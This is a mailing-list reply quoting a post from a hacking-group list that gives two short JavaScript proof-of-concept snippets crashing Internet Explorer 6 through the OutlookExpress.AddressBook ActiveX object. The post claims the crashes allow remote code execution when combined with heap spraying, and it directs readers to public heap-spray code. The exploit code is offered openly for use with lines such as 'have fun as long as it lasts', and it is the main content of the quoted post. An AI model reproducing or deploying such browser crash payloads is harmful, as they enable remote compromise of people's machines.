幸好国内主要盗版Win发行商都把OE等精简掉了。Vista以上也没有OE了。。。
On Jul 15, 10:17 am, 大风 <[EMAIL PROTECTED]> wrote:
> It's been a while, and I got a bit rusty on the 'ol browser hacks here and
> there, mainly because lack of time. That doesn't mean I didn't research some
> browser issues behind the screen. One of them is the XBM image processing in
> Firefox, and found that I cannot exploit it[1]. Which is good for Firefox
> users! Opera tends denial of service behavior on the XBM #define w/h header,
> which might be worthy to investigate some day. Nevertheless, I reverted a
> system to run solely Internet Explorer 6 to test some ideas a moment ago.
> Therefore, I am not sure if these exploits run on MSIE 7 or later. In any
> case, they crash MSIE 6 in such a way that remote code execution becomes
> possible by controlling the heap with Javascript aka heapspraying. Since
> there are a lot of heapspraying code blocks available on many hacking
> repositories I will not go into that, most of them are generic and can be
> re-used with a few tweaks, think Milw0rm, or HDM's website.
>
> OK, we are only crashing Internet explorer 6 with the dreaded Active-X
> objects from Microsoft just to toy with the idea. There have been many
> variations regarding the exploitation of Active-X, and this is simply
> another way of abusing them with the most minimal code. I simply wanted to
> obtain a method of crashing Internet Explorer with little means, and this is
> what the below examples do. And remember not all crashes are exploitable,
> but these generally are if you know what you are doing.
>
> Anyway, have fun as long as it lasts!
>
> Some compact examples, probably more variations possible:
>
> <script>
>
> for(i=0;i<33;i++){
>
> try{
>
> foo = new
> ActiveXObject("OutlookExpress.AddressBook").concat('3'+'3'+'3');
>
> }catch(e){}
>
> }
>
> </script>
>
> <script>
>
> for(i=0;i<33;i++){
>
> try{
>
> foo = new ActiveXObject("OutlookExpress.AddressBook").join(1,1,1);
>
> }catch(e){}
>
> }
>
> </script>
>
> And do whatever thou wishest!
>
> [1]http://mxr.mozilla.org/firefox/source/modules/libpr0n/decoders/xbm/ns...
> der.cpp#254
>
> [Ph4nt0m] <http://www.ph4nt0m.org/>
>
> [Ph4nt0m Security Team]
>
> <http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
>
> Email: [EMAIL PROTECTED]
>
> PingMe:
> <http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=han...
> hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
>
> === V3ry G00d, V3ry Str0ng ===
>
> === Ultim4te H4cking ===
>
> === XPLOITZ ! ===
>
> === #_# ===
>
> #If you brave,there is nothing you cannot achieve.#
>
> image001.gif
> 5KViewDownload
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
